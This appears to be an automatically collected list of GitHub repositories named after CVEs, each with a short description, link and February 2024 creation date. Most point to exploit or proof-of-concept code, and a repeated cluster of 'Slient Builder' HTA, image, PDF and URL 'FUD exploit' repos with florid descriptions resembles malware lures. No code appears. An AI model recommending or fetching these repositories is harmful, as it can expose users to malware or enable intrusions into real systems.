**no description** : [ewilded/CVE-2024-25376-POC](https://github.com/ewilded/CVE-2024-25376-POC) create time: 2024-02-24T09:30:45Z

**no description** : [ayrustogaru/cve-2023-39320](https://github.com/ayrustogaru/cve-2023-39320) create time: 2024-02-24T08:27:57Z

**A Scanner for CVE-2024-1709 - ConnectWise SecureConnect Authentication Bypass Vulnerability** : [HussainFathy/CVE-2024-1709](https://github.com/HussainFathy/CVE-2024-1709) create time: 2024-02-23T17:26:28Z

**CMP - Coming Soon & Maintenance < 3.8.2 - Improper Access Controls on AJAX Calls (Subscriber+)** : [RandomRobbieBF/CVE-2020-36730](https://github.com/RandomRobbieBF/CVE-2020-36730) create time: 2024-02-23T15:29:41Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [Twroza2/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Twroza2/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-23T12:34:04Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [Twroza2/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Twroza2/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-23T12:34:04Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [Twroza2/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Twroza2/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-23T12:34:03Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [Twroza2/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Twroza2/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-23T12:34:03Z

**no description** : [0xab01/-CVE-2019-11510-Exploit](https://github.com/0xab01/-CVE-2019-11510-Exploit) create time: 2024-01-26T04:16:27Z

**Bu betik, Microsoft Outlook'ta keşfedilen ve CVSS değeri 9.8 olan önemli bir güvenlik açığı olan CVE-2024-21413 için bir kavram kanıtı (PoC) sunmaktadır. MonikerLink hatası olarak adlandırılan bu güvenlik açığı, yerel NTLM bilgilerinin potansiyel sızıntısı ve uzaktan kod çalıştırma olasılığı dahil olmak üzere geniş kapsamlı etkilere sahiptir.** : [ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability) create time: 2024-02-23T12:13:11Z

**Python script to automate generic gadget chain from CVE-2024-1651. There's missed length and nullbytes URL Encoding.** : [sharpicx/CVE-2024-1651-PoC](https://github.com/sharpicx/CVE-2024-1651-PoC) create time: 2024-02-23T11:04:24Z

**env of CVE-2024-22243&CVE-2024-22234** : [shellfeel/CVE-2024-22243-CVE-2024-22234](https://github.com/shellfeel/CVE-2024-22243-CVE-2024-22234) create time: 2024-02-23T10:09:51Z

**no description** : [hungdnvp/POC-CVE-2020-0796](https://github.com/hungdnvp/POC-CVE-2020-0796) create time: 2024-02-23T08:41:29Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [ek3nk4r/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/ek3nk4r/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-22T10:51:50Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [ek3nk4r/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/ek3nk4r/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-22T10:51:40Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [ek3nk4r/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/ek3nk4r/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-22T10:51:25Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [ek3nk4r/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/ek3nk4r/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-22T10:46:42Z

**Android Application Task Hijacking Aka Strandhogg Attack Exploit** : [nahid0x1/CVE-2020-0096-strandhogg-exploit-p0c](https://github.com/nahid0x1/CVE-2020-0096-strandhogg-exploit-p0c) create time: 2024-02-22T20:55:46Z

**AI Engine: ChatGPT Chatbot <= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload** : [RandomRobbieBF/CVE-2023-51409](https://github.com/RandomRobbieBF/CVE-2023-51409) create time: 2024-02-22T16:26:57Z

**no description** : [K3ysTr0K3R/CVE-2022-33891-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-33891-EXPLOIT) create time: 2024-02-22T15:05:00Z

**no description** : [johnlaurance/CVE-2018-25031-test2](https://github.com/johnlaurance/CVE-2018-25031-test2) create time: 2024-02-22T10:41:45Z

**This tool is designed to exploit the CVE-2024-25600 vulnerability found in the Bricks Builder plugin for WordPress. The vulnerability allows for unauthenticated remote code execution on affected websites. The tool automates the exploitation process by retrieving nonces and sending specially crafted requests to execute arbitrary commands.** : [Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress) create time: 2024-02-22T10:53:45Z

**no description** : [pwndorei/CVE-2024-22532](https://github.com/pwndorei/CVE-2024-22532) create time: 2024-02-22T10:44:38Z

**for future article of research vulnerability in MIRAPOLIS LMS** : [fbkcs/CVE-2024-25270](https://github.com/fbkcs/CVE-2024-25270) create time: 2024-02-22T08:18:47Z

**Exploit for the Remote Code Execution (RCE) vulnerability identified in Metabase versions before 0.46.6.1 (open source) and 1.46.6.1 (Enterprise). Authentication is not required for exploitation.** : [UserConnecting/Exploit-CVE-2023-38646-Metabase](https://github.com/UserConnecting/Exploit-CVE-2023-38646-Metabase) create time: 2024-02-22T02:55:55Z

**no description** : [Jason-Siu/CVE-2019-9053-Exploit-in-Python-3](https://github.com/Jason-Siu/CVE-2019-9053-Exploit-in-Python-3) create time: 2024-02-21T18:47:21Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [Maddataroez/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Maddataroez/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-21T18:29:24Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [Maddataroez/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Maddataroez/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-21T18:29:23Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [Maddataroez/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Maddataroez/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-21T18:29:23Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [Maddataroez/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Maddataroez/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-21T18:29:23Z

**Scraping tool to ennumerate directories or files with the CVE-2024-23897 vulnerability in Jenkins.** : [Nebian/CVE-2024-23897](https://github.com/Nebian/CVE-2024-23897) create time: 2024-02-21T18:32:45Z

**ScreenConnect AuthBypass(cve-2024-1709) --> RCE!!!** : [W01fh4cker/ScreenConnect-AuthBypass-RCE](https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE) create time: 2024-02-21T09:42:04Z

**AI ChatBot <= 4.8.9 - Unauthenticated SQL Injection via qc_wpbo_search_response** : [RandomRobbieBF/CVE-2023-5204](https://github.com/RandomRobbieBF/CVE-2023-5204) create time: 2024-02-21T17:14:15Z

**An issue in He3 App for macOS version 2.0.17, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.** : [intbjw/CVE-2024-25249](https://github.com/intbjw/CVE-2024-25249) create time: 2024-02-21T08:19:00Z

**Nuclei template and information about the POC for CVE-2024-25600** : [Christbowel/CVE-2024-25600_Nuclei-Template](https://github.com/Christbowel/CVE-2024-25600_Nuclei-Template) create time: 2024-02-21T00:27:33Z

**Android Application Vulnerability Exploit** : [nahid0x1/Janus-Vulnerability-CVE-2017-13156-Exploit](https://github.com/nahid0x1/Janus-Vulnerability-CVE-2017-13156-Exploit) create time: 2024-02-20T21:56:02Z

**web-scraping : extract cve scores and infos from https://nvd.nist.gov/vuln/full-listing/ based on dates our main target is to extract 4 objects out of many in =~ 2000 web pages and orgnize them based on keyword in local storage in word documents/ csv files** : [mojibc1377/cveExtraction](https://github.com/mojibc1377/cveExtraction) create time: 2023-01-11T19:46:37Z

**Unauthenticated Remote Code Execution – Bricks <= 1.9.6** : [Chocapikk/CVE-2024-25600](https://github.com/Chocapikk/CVE-2024-25600) create time: 2024-02-20T20:16:09Z

**no description** : [brinhosa/CVE-2009-3036](https://github.com/brinhosa/CVE-2009-3036) create time: 2024-02-20T19:52:33Z

**no description** : [sk2wie/CVE-2024-21410-CITRIX](https://github.com/sk2wie/CVE-2024-21410-CITRIX) create time: 2024-02-20T18:39:30Z

**no description** : [Agampreet-Singh/CVE-2024-25202](https://github.com/Agampreet-Singh/CVE-2024-25202) create time: 2024-02-20T18:19:53Z

**Un script realizado en python para atumatizar la vulnerabilidad CVE-2024-23897** : [pulentoski/CVE-2024-23897-Arbitrary-file-read](https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read) create time: 2024-02-20T15:26:34Z

**no description** : [Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability) create time: 2024-02-20T12:41:15Z

**no description** : [ASR511-OO7/CVE-2024-25251](https://github.com/ASR511-OO7/CVE-2024-25251) create time: 2024-02-20T10:03:29Z

**no description** : [ASR511-OO7/CVE-2024-24103](https://github.com/ASR511-OO7/CVE-2024-24103) create time: 2024-02-20T08:35:46Z

**no description** : [ASR511-OO7/CVE-2024-24102](https://github.com/ASR511-OO7/CVE-2024-24102) create time: 2024-02-20T08:34:50Z

**no description** : [ASR511-OO7/CVE-2024-24101](https://github.com/ASR511-OO7/CVE-2024-24101) create time: 2024-02-20T08:34:02Z

**no description** : [ASR511-OO7/CVE-2024-24098](https://github.com/ASR511-OO7/CVE-2024-24098) create time: 2024-02-20T08:33:10Z

**no description** : [ASR511-OO7/CVE-2024-24097](https://github.com/ASR511-OO7/CVE-2024-24097) create time: 2024-02-20T08:32:13Z

**no description** : [ASR511-OO7/CVE-2024-24094](https://github.com/ASR511-OO7/CVE-2024-24094) create time: 2024-02-20T08:30:36Z

**no description** : [ASR511-OO7/CVE-2024-24093](https://github.com/ASR511-OO7/CVE-2024-24093) create time: 2024-02-20T08:29:44Z

**no description** : [ASR511-OO7/CVE-2024-24092](https://github.com/ASR511-OO7/CVE-2024-24092) create time: 2024-02-20T08:21:12Z

**no description** : [Ox130e07d/CVE-2024-25381](https://github.com/Ox130e07d/CVE-2024-25381) create time: 2024-02-01T11:42:48Z

**no description** : [ASR511-OO7/CVE-2023-43292](https://github.com/ASR511-OO7/CVE-2023-43292) create time: 2024-02-20T08:20:18Z

**no description** : [ASR511-OO7/CVE-2023-42308](https://github.com/ASR511-OO7/CVE-2023-42308) create time: 2024-02-20T08:18:59Z

**no description** : [ASR511-OO7/CVE-2023-42307](https://github.com/ASR511-OO7/CVE-2023-42307) create time: 2024-02-20T08:17:57Z

**no description** : [ASR511-OO7/CVE-2023-41501](https://github.com/ASR511-OO7/CVE-2023-41501) create time: 2024-02-20T08:16:19Z

**no description** : [ASR511-OO7/CVE-2023-41500](https://github.com/ASR511-OO7/CVE-2023-41500) create time: 2024-02-20T08:15:32Z

**no description** : [ASR511-OO7/CVE-2023-41499](https://github.com/ASR511-OO7/CVE-2023-41499) create time: 2024-02-20T08:14:00Z

**no description** : [ASR511-OO7/CVE-2023-41498](https://github.com/ASR511-OO7/CVE-2023-41498) create time: 2024-02-20T08:13:10Z

**no description** : [ASR511-OO7/CVE-2023-41497](https://github.com/ASR511-OO7/CVE-2023-41497) create time: 2024-02-20T08:12:08Z

**CLFS.sys vuln** : [MochiNishimiya/CVE-2021-31954](https://github.com/MochiNishimiya/CVE-2021-31954) create time: 2024-02-04T03:24:04Z

**no description** : [acesoyeo/METABASE-RCE-CVE-2023-38646-](https://github.com/acesoyeo/METABASE-RCE-CVE-2023-38646-) create time: 2024-02-20T01:51:47Z

**no description** : [HuangYanQwQ/CVE-2023-49496](https://github.com/HuangYanQwQ/CVE-2023-49496) create time: 2024-02-20T00:11:52Z

**历史漏洞的细节以及利用方法汇总收集** : [OracleNep/Nday-Exploit-Plan](https://github.com/OracleNep/Nday-Exploit-Plan) create time: 2024-02-11T06:55:47Z

**Joomla! < 4.2.8 - Unauthenticated information disclosure exploit** : [Rival420/CVE-2023-23752](https://github.com/Rival420/CVE-2023-23752) create time: 2024-02-19T10:27:01Z

**CVE-2024-22369 Reproducer** : [oscerd/CVE-2024-22369](https://github.com/oscerd/CVE-2024-22369) create time: 2024-01-10T11:01:59Z

**CVE-2024-206565** : [sk2wie/CVE-2024-206565](https://github.com/sk2wie/CVE-2024-206565) create time: 2024-02-19T09:06:06Z

**Perform with massive Jenkins Reading-2-RCE** : [ThatNotEasy/CVE-2024-23897](https://github.com/ThatNotEasy/CVE-2024-23897) create time: 2024-02-19T02:29:12Z

**CVE-2023-47218: QNAP QTS and QuTS Hero Unauthenticated Command Injection (FIXED)** : [passwa11/CVE-2023-47218](https://github.com/passwa11/CVE-2023-47218) create time: 2024-02-19T02:15:21Z

**CVE-2024-21413 Açığını Kullanarak Giriş Bilgilerini Alma** : [MSeymenD/CVE-2024-21413](https://github.com/MSeymenD/CVE-2024-21413) create time: 2024-02-19T01:37:15Z

**KeyTrap (DNS)** : [knqyf263/CVE-2023-50387](https://github.com/knqyf263/CVE-2023-50387) create time: 2024-02-18T21:50:04Z

**no description** : [MY7H404/CVE-2021-3560-Polkit](https://github.com/MY7H404/CVE-2021-3560-Polkit) create time: 2024-02-18T20:31:20Z

**no description** : [Kaue-Navarro/POC-CVE-2023-49209](https://github.com/Kaue-Navarro/POC-CVE-2023-49209) create time: 2024-02-18T20:51:17Z

**CVE-2023-36845 – Unauthenticated Juniper Remote Code Execution Vulnerability Scanner** : [e11i0t4lders0n/CVE-2023-36845](https://github.com/e11i0t4lders0n/CVE-2023-36845) create time: 2024-02-18T15:37:58Z

**Simple python3 script to automate CVE-2018-9995** : [X3RX3SSec/DVR_Sploit](https://github.com/X3RX3SSec/DVR_Sploit) create time: 2024-02-18T12:46:32Z

**Proof of concept code for CVE-2022-24785** : [isira-adithya/CVE-2022-24785-POC](https://github.com/isira-adithya/CVE-2022-24785-POC) create time: 2024-02-18T12:58:24Z

**PoC for Exim CVE-2023-42115** : [cammclain/CVE-2023-42115](https://github.com/cammclain/CVE-2023-42115) create time: 2024-02-18T10:07:49Z

**no description** : [132231g/CVE-2018-7602](https://github.com/132231g/CVE-2018-7602) create time: 2024-02-18T08:51:09Z

**Cinema 4D out-of-bounds write vulnerability when parsing c4d files** : [DriverUnload/cve-2024-25423](https://github.com/DriverUnload/cve-2024-25423) create time: 2024-02-18T06:35:31Z

**CVE-2024-21413 PoC for THM Lab** : [CMNatic/CVE-2024-21413](https://github.com/CMNatic/CVE-2024-21413) create time: 2024-02-17T14:52:52Z

**CVE-2021-46361: FreeMarker Restriction Bypass in Magnolia CMS** : [mbadanoiu/CVE-2021-46361](https://github.com/mbadanoiu/CVE-2021-46361) create time: 2024-02-16T20:36:32Z

**A tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)** : [shri142/ZipScan](https://github.com/shri142/ZipScan) create time: 2024-02-17T12:10:12Z

**(XSS)** : [sajaljat/CVE-2024-1269](https://github.com/sajaljat/CVE-2024-1269) create time: 2024-02-17T12:21:17Z

**(XSS)** : [sajaljat/CVE-2024-25809](https://github.com/sajaljat/CVE-2024-25809) create time: 2024-02-17T12:16:29Z

**(XSS)** : [sajaljat/CVE-2024-25281](https://github.com/sajaljat/CVE-2024-25281) create time: 2024-02-17T12:14:56Z

**Broken Access control** : [sajaljat/CVE-2024-25280](https://github.com/sajaljat/CVE-2024-25280) create time: 2024-02-17T12:11:58Z

**(XSS)** : [sajaljat/CVE-2024-25279](https://github.com/sajaljat/CVE-2024-25279) create time: 2024-02-17T12:10:12Z

**no description** : [sajaljat/CVE-2024-25278](https://github.com/sajaljat/CVE-2024-25278) create time: 2024-02-17T11:59:51Z

**Microsoft Outlook Information Disclosure Vulnerability (leak password hash)** : [labesterOct/CVE-2024-21413](https://github.com/labesterOct/CVE-2024-21413) create time: 2024-02-17T11:11:53Z

**A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code.** : [ifconfig-me/CVE-2023-36845](https://github.com/ifconfig-me/CVE-2023-36845) create time: 2024-02-17T08:15:30Z

**no description** : [nles-crt/CVE-2023-6895](https://github.com/nles-crt/CVE-2023-6895) create time: 2024-02-07T09:28:10Z

**Log4Shell CVE Analysis** : [ItsCbass/CVE-2021-44228](https://github.com/ItsCbass/CVE-2021-44228) create time: 2024-02-16T23:54:32Z

**Jenkins Arbitrary File Leak Vulnerability [CVE-2024-23897]** : [ifconfig-me/CVE-2024-23897](https://github.com/ifconfig-me/CVE-2024-23897) create time: 2024-02-16T23:21:40Z

**no description** : [r00tb1t/CVE-2024-21413-POC](https://github.com/r00tb1t/CVE-2024-21413-POC) create time: 2024-02-16T21:10:31Z

**no description** : [AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777](https://github.com/AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777) create time: 2024-02-16T19:36:50Z

**no description** : [wxrdnx/CVE-2023-38408](https://github.com/wxrdnx/CVE-2023-38408) create time: 2024-02-16T18:20:12Z

**Microsoft-Outlook-Remote-Code-Execution-Vulnerability** : [xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability) create time: 2024-02-16T15:17:59Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [M54S/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/M54S/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-16T13:46:01Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [M54S/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/M54S/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-16T13:46:01Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [M54S/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/M54S/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-16T13:46:01Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [M54S/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/M54S/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-16T13:46:00Z

**CVE-2024-25735 - WyreStorm Apollo VX20 - Information Disclosure** : [codeb0ss/CVE-2024-25735-PoC](https://github.com/codeb0ss/CVE-2024-25735-PoC) create time: 2024-02-16T12:03:20Z

**CVE-2023-25203: Application Vulnerable to SSRF (Server Side Request Forgery) Attacks** : [Trackflaw/CVE-2023-25203](https://github.com/Trackflaw/CVE-2023-25203) create time: 2024-02-16T08:29:25Z

**CVE-2023-25202: Insecure file upload mechanism** : [Trackflaw/CVE-2023-25202](https://github.com/Trackflaw/CVE-2023-25202) create time: 2024-02-16T08:22:48Z

**no description** : [colaoo123/cve-2022-22555](https://github.com/colaoo123/cve-2022-22555) create time: 2024-02-16T07:45:51Z

**POC for CVE-2024-23897 Jenkins File-Read** : [godylockz/CVE-2024-23897](https://github.com/godylockz/CVE-2024-23897) create time: 2024-02-16T07:16:04Z

**no description** : [supportmango/CVE-2024-23222-patch](https://github.com/supportmango/CVE-2024-23222-patch) create time: 2024-02-16T04:40:46Z

**Juniper - Remote Code Execution (CVE-2023-36845) PreAuth-RCE Exploits** : [imhunterand/CVE-2023-36845](https://github.com/imhunterand/CVE-2023-36845) create time: 2024-02-15T20:17:33Z

**Microsoft Outlook Remote Code Execution Vulnerability** : [duy-31/CVE-2024-21413](https://github.com/duy-31/CVE-2024-21413) create time: 2024-02-15T19:57:38Z

**no description** : [druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation](https://github.com/druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation) create time: 2024-02-15T16:35:59Z

**PowerShell script that can help you automate updating the Windows Recovery Environment (WinRE) on deployed devices to address the security vulnerabilities in CVE-2024-20666.** : [nnotwen/Script-For-CVE-2024-20666](https://github.com/nnotwen/Script-For-CVE-2024-20666) create time: 2024-02-15T13:53:21Z

**no description** : [abdomagdy0/CVE-2024-23897-htb](https://github.com/abdomagdy0/CVE-2024-23897-htb) create time: 2024-02-15T12:37:34Z

**Description for CVE-2024-25466** : [FixedOctocat/CVE-2024-25466](https://github.com/FixedOctocat/CVE-2024-25466) create time: 2024-02-15T07:47:14Z

**no description** : [letsr00t/CVE-2022-0847](https://github.com/letsr00t/CVE-2022-0847) create time: 2024-02-15T02:27:27Z

**no description** : [ST3G4N05/ExploitScript-CVE-2023-46604](https://github.com/ST3G4N05/ExploitScript-CVE-2023-46604) create time: 2024-02-14T18:39:49Z

**CVE-2023-47464 POC** : [HadessCS/CVE-2023-47464](https://github.com/HadessCS/CVE-2023-47464) create time: 2024-02-14T15:39:34Z

**This Python script automates the Proof of Concept (PoC) for CVE-2023-36845, a vulnerability impacting Juniper Networks Junos OS on EX and SRX Series devices. The vulnerability resides in the J-Web component, allowing remote manipulation of the PHPRC variable, potentially leading to code injection.** : [0xNehru/CVE-2023-36845-Juniper-Vulnerability](https://github.com/0xNehru/CVE-2023-36845-Juniper-Vulnerability) create time: 2024-02-14T12:47:21Z

**no description** : [erick-duarte/CVE-2024-24386](https://github.com/erick-duarte/CVE-2024-24386) create time: 2024-02-09T12:22:08Z

**Tool for exploring CVE-2023-30547** : [Cur1iosity/CVE-2023-30547](https://github.com/Cur1iosity/CVE-2023-30547) create time: 2024-02-14T13:05:57Z

**NextMove Lite < 2.18.0 - Subscriber+ Arbitrary Plugin Installation/Activation** : [RandomRobbieBF/CVE-2024-25092](https://github.com/RandomRobbieBF/CVE-2024-25092) create time: 2024-02-14T11:30:59Z

**CVE-2021-46362: FreeMarker Server-Side Template Injection in Magnolia CMS** : [mbadanoiu/CVE-2021-46362](https://github.com/mbadanoiu/CVE-2021-46362) create time: 2024-02-13T18:08:02Z

**Explotación CVE-2017-1000486** : [jam620/primefaces](https://github.com/jam620/primefaces) create time: 2024-02-13T23:33:16Z

**CVE-2024-23897** : [B4CK4TT4CK/CVE-2024-23897](https://github.com/B4CK4TT4CK/CVE-2024-23897) create time: 2024-02-13T22:38:50Z

**CVE-2021-46366: Credential Bruteforce Attack via CSRF + Open Redirect in Magnolia CMS** : [mbadanoiu/CVE-2021-46366](https://github.com/mbadanoiu/CVE-2021-46366) create time: 2024-02-13T21:09:53Z

**CVES** : [ak1t4/CVE-2023-36845](https://github.com/ak1t4/CVE-2023-36845) create time: 2024-02-13T20:59:34Z

**CVE-2021-46365: Unsafe XML Parsing in Magnolia CMS** : [mbadanoiu/CVE-2021-46365](https://github.com/mbadanoiu/CVE-2021-46365) create time: 2024-02-13T20:52:49Z

**CVE-2021-46363: Formula Injection in Magnolia CMS** : [mbadanoiu/CVE-2021-46363](https://github.com/mbadanoiu/CVE-2021-46363) create time: 2024-02-13T20:36:24Z

**CVE-2023-36845 и CVE-2023-36846 Juniper Junos OS J-Web RCE** : [iveresk/CVE-2023-36845-6-](https://github.com/iveresk/CVE-2023-36845-6-) create time: 2024-02-13T14:59:59Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [dusktuka/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/dusktuka/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-13T14:56:35Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [dusktuka/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/dusktuka/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-13T14:52:58Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [dusktuka/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/dusktuka/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-13T14:52:58Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [dusktuka/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/dusktuka/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-02-13T14:52:57Z

**CVE-2017-0089 Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information** : [rainhawk13/Added-Pentest-Ground-to-vulnerable-websites-for-training](https://github.com/rainhawk13/Added-Pentest-Ground-to-vulnerable-websites-for-training) create time: 2024-02-08T03:33:56Z

**no description** : [whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-](https://github.com/whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-) create time: 2024-02-12T20:59:08Z

**no description** : [whoami-chmod777/CVE-2021-1675-CVE-2021-34527](https://github.com/whoami-chmod777/CVE-2021-1675-CVE-2021-34527) create time: 2024-02-12T20:54:51Z

**no description** : [SamTruss/LMU-CVE-2021-3156](https://github.com/SamTruss/LMU-CVE-2021-3156) create time: 2024-02-12T11:24:31Z

**no description** : [Team-Byerus/CVE-2023-51000](https://github.com/Team-Byerus/CVE-2023-51000) create time: 2024-02-12T12:06:07Z

**File Upload vulnerability in MCMS 5.3.5** : [labesterOct/CVE-2024-22567](https://github.com/labesterOct/CVE-2024-22567) create time: 2024-02-12T06:19:19Z

**CuteNews 2.1.2 - CVE-2019-11447 Proof-Of-Concept** : [CRFSlick/CVE-2019-11447-POC](https://github.com/CRFSlick/CVE-2019-11447-POC) create time: 2024-02-11T21:36:58Z

**no description** : [quangnh89/CVE-2022-4262](https://github.com/quangnh89/CVE-2022-4262) create time: 2024-02-11T18:53:05Z

**CVE-2023-22527 内存马注入工具** : [Boogipop/CVE-2023-22527-Godzilla-MEMSHELL](https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL) create time: 2024-02-11T16:46:55Z

**no description** : [vidura2/cve-2023-46747](https://github.com/vidura2/cve-2023-46747) create time: 2024-02-11T14:38:37Z

**Python3 Shellshock (CVE-2014-6271) Scanner** : [hackintoanetwork/shellshock](https://github.com/hackintoanetwork/shellshock) create time: 2024-02-11T09:29:02Z

**no description** : [brandon-t-elliott/CVE-2024-22867](https://github.com/brandon-t-elliott/CVE-2024-22867) create time: 2024-02-11T01:52:52Z

**no description** : [HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation](https://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation) create time: 2024-02-10T16:12:52Z

**my own script in python to exploit vulnerable (It based on TryHackMe Intro PoC Scripting room)** : [LeDucKhiem/CVE-2012-2982](https://github.com/LeDucKhiem/CVE-2012-2982) create time: 2024-02-10T14:58:11Z

